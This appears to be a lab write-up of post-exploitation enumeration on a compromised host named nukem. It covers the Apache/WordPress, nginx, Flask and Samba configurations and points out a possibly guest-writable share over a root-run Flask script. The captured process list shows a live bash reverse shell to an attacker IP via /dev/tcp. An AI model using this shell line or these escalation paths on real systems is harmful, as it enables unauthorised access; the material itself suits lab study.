Beyond


This is the "beyond" page: additional post-exploitation enumeration and assessment performed as the root user after the target system was compromised.

WordPress (httpd.service)


[root@nukem ~]# systemctl status httpd.service
 httpd.service - Apache Web Server
     Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
     Active: active (running) since Thu 2025-01-30 07:49:09 UTC; 1 months 9 days ago
   Main PID: 300 (httpd)
      Tasks: 10 (limit: 2361)
     Memory: 86.1M
     CGroup: /system.slice/httpd.service
             ├─300 /usr/bin/httpd -k start -DFOREGROUND
             ├─385 /usr/bin/httpd -k start -DFOREGROUND
             ├─387 /usr/bin/httpd -k start -DFOREGROUND
             ├─388 /usr/bin/httpd -k start -DFOREGROUND
             ├─389 /usr/bin/httpd -k start -DFOREGROUND
             ├─390 /usr/bin/httpd -k start -DFOREGROUND
             ├─683 /usr/bin/httpd -k start -DFOREGROUND
             ├─901 /usr/bin/httpd -k start -DFOREGROUND
             ├─903 sh -c bash -i >& /dev/tcp/192.168.45.192/5000 0>&1
             └─904 bash -i

/usr/lib/systemd/system/httpd.service

[root@nukem ~]# cat /usr/lib/systemd/system/httpd.service
[Unit]
Description=Apache Web Server
After=network.target remote-fs.target nss-lookup.target
 
[Service]
Type=simple
ExecStart=/usr/bin/httpd -k start -DFOREGROUND
ExecStop=/usr/bin/httpd -k graceful-stop
ExecReload=/usr/bin/httpd -k graceful
PrivateTmp=true
LimitNOFILE=infinity
KillMode=mixed
 
[Install]
WantedBy=multi-user.target
 
[root@nukem ~]# cat /etc/httpd/conf/httpd.conf | grep -v '^#'
ServerRoot "/etc/httpd"
 
Listen 80
 
[...REDACTED...]
 
<IfModule unixd_module>
User http
Group http
</IfModule>
 
ServerAdmin you@example.com
 
<Directory />
    AllowOverride none
    Require all denied
</Directory>
 
DocumentRoot "/srv/http"
<Directory "/srv/http">
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
 
<IfModule dir_module>
    DirectoryIndex index.html
</IfModule>
 
<Files ".ht*">
    Require all denied
</Files>
 
ErrorLog "/var/log/httpd/error_log"
LogLevel warn
 
<IfModule log_config_module>
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
 
    <IfModule logio_module>
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    </IfModule>
    CustomLog "/var/log/httpd/access_log" common
</IfModule>
 
<IfModule alias_module>
    ScriptAlias /cgi-bin/ "/srv/http/cgi-bin/"
</IfModule>
 
<IfModule cgid_module>
</IfModule>
 
<Directory "/srv/http/cgi-bin">
    AllowOverride None
    Options None
    Require all granted
</Directory>
 
<IfModule headers_module>
    RequestHeader unset Proxy early
</IfModule>
 
<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
</IfModule>
 
 
 
 
 
 
Include conf/extra/httpd-mpm.conf
Include conf/extra/httpd-multilang-errordoc.conf
Include conf/extra/httpd-autoindex.conf
Include conf/extra/httpd-languages.conf
Include conf/extra/httpd-userdir.conf
 
Include conf/extra/httpd-default.conf
 
<IfModule proxy_html_module>
Include conf/extra/proxy-html.conf
</IfModule>
 
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
 
LoadModule php7_module modules/libphp7.so
AddHandler php7-script php
Include conf/extra/php7_module.conf
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

/srv/http

[root@nukem ~]# ll /srv/http
total 13M
4.0K drwxr-xr-x  7 http root   4.0K Mar 10 20:09 .
4.0K -rw-------  1 http http    865 Mar 10 20:09 .bash_history
4.0K drwx------  3 root http   4.0K Mar 10 19:17 .config
4.0K drwxr-xr-x  5 http nobody 4.0K Oct 29  2020 wp-content
4.0K -rw-r--r--  1 http http    461 Sep 28  2020 .htaccess
4.0K -rw-r--r--  1 http root   2.9K Sep 18  2020 wp-config.php
4.0K drwxr-xr-x  2 http nobody 4.0K Sep 18  2020 wordpress
4.0K drwxr-xr-x  4 root root   4.0K Sep 18  2020 ..
 13M -rw-r--r--  1 http root    13M Sep  1  2020 latest.tar.gz
4.0K drwxr-xr-x  9 http nobody 4.0K Sep  1  2020 wp-admin
 12K drwxr-xr-x 24 http nobody  12K Sep  1  2020 wp-includes
8.0K -rw-r--r--  1 http nobody 7.0K Jul 28  2020 wp-activate.php
 32K -rw-r--r--  1 http nobody  31K Jul 23  2020 wp-signup.php
4.0K -rw-r--r--  1 http nobody 2.3K Jul 23  2020 wp-comments-post.php
 48K -rw-r--r--  1 http nobody  48K Jul  7  2020 wp-login.php
 20K -rw-r--r--  1 http nobody  20K Jul  6  2020 wp-settings.php
8.0K -rw-r--r--  1 http nobody 7.2K Jun 26  2020 readme.html
4.0K -rw-r--r--  1 http nobody 3.2K Jun  8  2020 xmlrpc.php
 12K -rw-r--r--  1 http nobody 8.4K Apr 14  2020 wp-mail.php
 20K -rw-r--r--  1 http nobody  20K Feb 12  2020 license.txt
4.0K -rw-r--r--  1 http nobody  405 Feb  6  2020 index.php
4.0K -rw-r--r--  1 http nobody  351 Feb  6  2020 wp-blog-header.php
4.0K -rw-r--r--  1 http nobody 2.9K Feb  6  2020 wp-config-sample.php
4.0K -rw-r--r--  1 http nobody 3.9K Feb  6  2020 wp-cron.php
4.0K -rw-r--r--  1 http nobody 2.5K Feb  6  2020 wp-links-opml.php
4.0K -rw-r--r--  1 http nobody 3.3K Feb  6  2020 wp-load.php
8.0K -rw-r--r--  1 http nobody 4.7K Feb  6  2020 wp-trackback.php

Login V14 (nginx.service)


[root@nukem ~]# systemctl status nginx.service
 nginx.service - A high performance web server and a reverse proxy server
     Loaded: loaded (/usr/lib/systemd/system/nginx.service; enabled; vendor preset: disabled)
     Active: active (running) since Thu 2025-01-30 07:51:09 UTC; 1 months 9 days ago
    Process: 551 ExecStart=/usr/bin/nginx -g pid /run/nginx.pid; error_log stderr; (code=exited, status=0/SUCCESS)
   Main PID: 554 (nginx)
      Tasks: 2 (limit: 2361)
     Memory: 3.7M
     CGroup: /system.slice/nginx.service
             ├─554 nginx: master process /usr/bin/nginx -g pid /run/nginx.pid; error_log stderr;
             └─555 nginx: worker process
 

/usr/lib/systemd/system/nginx.service

[root@nukem ~]# cat /usr/lib/systemd/system/nginx.service
[Unit]
Description=A high performance web server and a reverse proxy server
After=network.target network-online.target nss-lookup.target
 
[Service]
Type=forking
PIDFile=/run/nginx.pid
PrivateDevices=yes
SyslogLevel=err
 
ExecStart=/usr/bin/nginx -g 'pid /run/nginx.pid; error_log stderr;'
ExecReload=/usr/bin/nginx -s reload
KillMode=mixed
 
[Install]
WantedBy=multi-user.target
[root@nukem ~]# cat /etc/nginx/nginx.conf | grep -v '^#'
 
worker_processes  1;
 
 
 
 
events {
    worker_connections  1024;
}
 
 
http {
    include       mime.types;
    default_type  application/octet-stream;
    sendfile        on;
    keepalive_timeout  65;
    server {
        listen       13000;
        server_name  localhost;
 
        location / {
            root   /usr/share/nginx/html;
            index  index.html index.htm;
        }
 
        error_page   500 502 503 504  /50x.html;
        location = /50x.html {
            root   /usr/share/nginx/html;
        }
    }
}

/usr/share/nginx/html

[root@nukem ~]# ll /usr/share/nginx/html
total 48K
4.0K drwxr-xr-x  8 root root 4.0K Sep 28  2020 .
4.0K drwxr-xr-x  2 root root 4.0K Sep 28  2020 Login_v14
4.0K drwxr-xr-x  3 root root 4.0K Sep 28  2020 ..
4.0K -rw-r--r--  1 root root  494 Aug 20  2020 50x.html
4.0K -rw-r--r--  1 root root  612 Aug 20  2020 index.html.orig
4.0K drwxr-xr-x  8 root root 4.0K Jan  6  2018 fonts
4.0K drwxr-xr-x  2 root root 4.0K Jan  6  2018 css
4.0K drwxr-xr-x  3 root root 4.0K Jan  6  2018 images
4.0K drwxr-xr-x  2 root root 4.0K Jan  6  2018 js
4.0K drwxr-xr-x 11 root root 4.0K Jan  6  2018 vendor
8.0K -rwxr-xr-x  1 root root 5.0K Dec 18  2017 index.html
 
[root@nukem ~]# ll /usr/share/nginx/html/Login_v14/
total 8.0K
4.0K drwxr-xr-x 2 root root 4.0K Sep 28  2020 .
4.0K drwxr-xr-x 8 root root 4.0K Sep 28  2020 .

Nothing of interest: the Login_v14 directory is empty, and the nginx vhost on port 13000 only serves static files from /usr/share/nginx/html, so the login page appears to be a dummy front-end with no backend handling the submitted credentials.

Flask Application (pythonflask.service)


[root@nukem ~]# systemctl status pythonflask.service
 pythonflask.service - FlaskApp
     Loaded: loaded (/etc/systemd/system/pythonflask.service; enabled; vendor preset: disabled)
     Active: active (running) since Thu 2025-01-30 07:51:09 UTC; 1 months 9 days ago
   Main PID: 552 (python)
      Tasks: 1 (limit: 2361)
     Memory: 38.8M
     CGroup: /system.slice/pythonflask.service
             └─552 /usr/bin/python /home/commander/python_rest_flask/server.py
 
[root@nukem ~]# cat /etc/systemd/system/pythonflask.service
[Unit]
Description=FlaskApp
After=network-online.target
 
[Service]
Type=simple
PIDFile=/run/pythonflask.pid
ExecStart=/usr/bin/python /home/commander/python_rest_flask/server.py
ExecUser=commander
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
 
[Install]
WantedBy=multi-user.target

/home/commander/python_rest_flask

[root@nukem ~]# ll /home/commander/python_rest_flask
total 888K
4.0K drwxr-xr-x 10 commander commander 4.0K Jan 30 07:49 ..
4.0K drwxr-xr-x  2 commander commander 4.0K Sep 18  2020 .
4.0K -rw-r--r--  1 commander commander 2.5K Sep 18  2020 server.py
864K -rwxr-xr-x  1 commander commander 864K Sep 18  2020 chinook.db
4.0K -rw-r--r--  1 commander commander  287 Sep 18  2020 requirements.txt
4.0K -rw-r--r--  1 commander commander   15 Sep 18  2020 .gitignore
4.0K -rw-r--r--  1 commander commander  417 Sep 18  2020 README.md

Its contents are identical to what was exposed over the SMB share (see below). Note also that `ExecUser=commander` in the unit file is not a valid systemd directive (the correct key is `User=`); systemd ignores unknown keys, so server.py is likely running as root rather than as commander — confirm with `ps -o user= -p 552`.

Samba


[root@nukem ~]# cat /etc/samba/smb.conf | grep -v '^#'
[Commander]
    comment = Commander Files
    path = /home/commander/python_rest_flask/
    public = yes
    writable = no
    browsable = yes
    read only = no
    force user = commander

The share path is set to /home/commander/python_rest_flask/, the same directory the Flask service loads server.py from. The share definition is contradictory (`writable = no` but `read only = no`); in Samba these are inverse synonyms and the later setting takes precedence, so with `public = yes` and `force user = commander` the share should be treated as guest-writable — verify with `testparm -s` or an `smbclient` upload test.